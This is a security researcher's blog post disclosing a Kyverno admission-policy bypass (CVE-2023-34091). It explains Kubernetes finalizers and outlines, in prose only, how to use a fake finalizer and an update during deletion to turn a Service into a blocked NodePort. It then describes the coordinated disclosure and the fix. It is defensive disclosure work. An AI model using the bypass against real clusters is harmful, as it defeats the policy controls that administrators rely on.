Kyverno CVE-2023-34091: Bypassing policies using Kubernetes finalizers

Blake Burkhart
Defense Unicorns
Published in
7 min readJun 13, 2023

--

In security research, it's crucial to adopt an attacker mindset and explore the unexpected. This blog post delves into an intriguing journey of stumbling across a security bug in Kyverno, a Kubernetes admission webhook server used for validating and mutating resources with customizable policies. The exploration began with a seemingly innocuous experiment to implement a finalizer using Kyverno, only to discover that it ignored resources with a deletionTimestamp set. While this could have been the end of the story, the author's curiosity led to uncovering a potentially exploitable vulnerability. Join us as we explore the intricacies of this bug and its impact on policy enforcement during resource deletion, shedding light on the importance of security research in open-source software development and implementation.

How to stumble across security bugs

  1. Always think like an attacker
  2. Do silly things with software (this ends up exercising weird combinations of features)
  3. When it doesn't work (because you were doing something ridiculous), figure out if there's a bug
  4. With an attacker mindset, consider if the bug is exploitable

Specifically, I decided to try implementing a finalizer using Kyverno (a Kubernetes admission webhook server with customizable policies for validating and mutating resources) by writing a ClusterPolicy to match resources with a deletionTimestamp. This is a silly thing to use Kyverno for but could have been useful for writing a proof of concept finalizer without writing any code. It turns out that this was impossible because Kyverno ignored resources with a deletionTimetamp set.

Now, this could just be the end of my idea to implement a finalizer with Kyverno… but I asked, "what's the impact of not performing validation on these resources?" I tried to see if this is somehow exploitable… it looked like Kyverno would sometimes not enforce validation policies which sounded scary.

A quick refresher on how deletion works in Kubernetes

  1. A Kubernetes API client performs an HTTP DELETE on a resource.
  2. If .metadata.finalizers[] in the resource is empty or doesn't exist, the Kubernetes API will remove the resource immediately.

    — Webhooks will see one DELETE operation on the resource.
  3. If .metadata.finalizers[] is not empty, instead of removing the resource, the Kubernetes API will update the resource with .metadata.deletionTimestamp set to the current time.

    — Webhooks will see the same DELETE operation on the resource as above, .metadata.deletionTimestamp will not be set yet. This corresponds to the user's Kubernetes API request.

    — If changes are made to the resource during deletion, Webhooks will see UPDATE operations on the resource with .metadata.deletionTimestamp set.

    — A controller implementing a finalizer will notice the added .metadata.deletionTimestamp and begin whatever finalization steps it needs to do. When it finishes, it will update the resource to remove its finalizer key from .metadata.finalizers[].

    — A well-behaved controller probably should ignore anything changed inside .spec if .metadata.deletionTimestamp is non-nil.
  4. When .metadata.finalizers[] is eventually (updated to) an empty list, the Kubernetes API will actually remove the resource.

    — Webhooks will see an UPDATE operation on the resource previously deleted. The only indication in the AdmissionReview that this UPDATE is on a previously deleted resource and will result in removal is that .metadata.deletionTimestamp is present and .metadata.finalizers[] is being removed. Again, this corresponds to the Kubernetes API request (likely from the controller implementing the finalizer in this case).

If you want to observe this process yourself, set the --dumpPayload=true flag on Kyverno's admission controller and grep the logs for a resource as you delete it.

It seemed like Kyverno's behavior of ignoring resources with deletionTimetamp set was a bug and potentially exploitable, but I tried a few resource kinds, and at first, I was unable to exploit anything. Some resource kinds (e.g. Pods) are mostly immutable: an update isn't allowed to edit most of the fields in .spec. Some resource kinds (e.g. Pods, but also Deployments, StatefulSets, DaemonSets, etc) ignore changes to .spec during deletion (for example, upon deletion, a Pod begins termination of the container and ignores all further updates). Also, deletion usually happens very quickly, and there's no opportunity to update the resource during deletion.

So… how is this bug exploitable?

Indeed, Kyverno does not enforce any policies on UPDATE operations on resources if .metadata.deletionTimestamp is non-nil.

It's possible to add a bogus non-existent bburky.com/hax finalizer to a resource's .metadata.finalizers[]. Because nothing implements this finalizer, deletion of a resource may be delayed indefinitely.

  • Perhaps it is possible to race an existing finalizer, but this trick makes the exploit very reliable.

Most, but not all, controllers ignore changes to the .spec after deletion begins.

  • Notably, Pods begin termination as soon as .metadata.deletionTimestamp is set. Even though .spec.containers[].image is mutable, UPDATE operations are ignored during deletion.
    This does limit the impact of this vulnerability. It is very common to use Kyverno to implement policies on Pods. These policies are unaffected by this exploit.
  • Some resources don't really have a controller at all. ConfigMaps don't really have a controller of their own, instead other controllers of other resources like Pods use them. It turns out that you can actually mount a ConfigMap that's being deleted in a Pod's .spec.volumes and updates will be reflected in the filesystem.
  • CRDs have their own custom controllers, and they should check for .metadata.deletionTimestamp... but not all of them do. Kubebuilder's scaffold templates do correctly check it, but controllers that manually implement Reconcile() using controller-runtime might forget to implement this check.
  • It's possible that the built-in Kubernetes controllers have bugs or inconsistent behavior. After some research I discovered that during finalization, updates to LoadBalancer Services may be ignored and remain pending. However, NodePort Services updated during finalization will create a listening NodePort.

I decided this weird behavior of NodePorts best demonstrated the Kyverno bug's exploitability. Kyverno provides a "best practices" policy for Disallow NodePort; if I could find a way to create a NodePort with this policy in place, I would demonstrate that I found a vulnerability.

And… it actually worked:

  1. Create a Service with an allowed type like ClusterIP
  2. Maliciously add a non-existent finalizer to the Service and delete the Service.
  3. Update the Service to change its type to NodePort.
    This is the vulnerability in Kyverno: it should still enforce validation policies, even during deletion.
  4. Test access to the Service via the NodePort to demonstrate that Kubernetes NodePorts are applied even during deletion.
    This is arguably a bug in Kubernetes but is not a security bug in Kubernetes. Kyverno is a generic policy tool and should not assume any particular behavior of resources.

Vulnerability Reporting

Following the process in Kyverno's SECURITY.mdI sent the following report and proof of concept exploit to kyverno-security@googlegroups.com:

validationFailureAction: Enforce policies may be bypassed by editing resources during finalization
https://gist.github.com/bburky/c137b39dd2ec48c9efd818af7507465e

The Kyverno team responded promptly and immediately started working on a fix to include in the then-upcoming v1.10.0 major update. The fix was initially done in a public GitHub PR (but without any notes about security impact) and included in an alpha release. I was notified of the fix via email and was able to test the patch before the update and security advisory was released. I reported that the fix was incomplete, and a second patch was added that fully resolved the issue. The Kyverno v1.10.0 release resolves this vulnerability and includes both patches. Kyverno converted my proof of concept exploit into a unit test, which I thought was great.

A security advisory was issued after the v1.10.0 release. The advisory rates the severity as "low," which I concur with for policies on Pods, for which there is no security impact. However, the impact may be much higher if you use policies on some built-in kinds (such as Services or ConfigMaps) or policies on Custom Resources if they apply updates during deletion.

This is a good response overall. All software has bugs, but this issue was handled well and resolved appropriately. The vulnerability was fixed within a reasonable timeframe, and I was always kept informed of the progress.

Reporting timeline (Me ➡️ Kyverno):

Thank you to the Kyverno team, especially Chip Zoller, for your help getting this fixed, and congratulations on releasing the 1.10.0 update with lots of new features too.

This specific issue only applied to Kyverno, but it is possible for similar vulnerabilities to exist in other admission webhooks. I did find multiple cases of various controllers and resource kinds (including some built-in to Kubernetes) with surprising behavior during deletion; any project doing similar policy enforcement should be careful not to assume any particular behavior of resources during deletion.

At Defense Unicorns, we believe in creating and supporting open-source software. In addition to releasing open-source software ourselves, we try to contribute back to the open-source community. Open source contributions usually mean new features, bug reports, or fixes, but they can also include security reviews of important software.

Kyverno is used as a Kubernetes policy-checking tool in Platform One's Big Bang to validate software is correctly configured to meet DoD DevSecOps Reference Architecture requirements. Cluster administrators might also use Kyverno to allow developers to safely deploy mission applications by using policies to enforce restrictions what resources may be deployed. Security research like this is important to validate that our usage of tools like Kyverno correctly implements security controls as designed.

--

--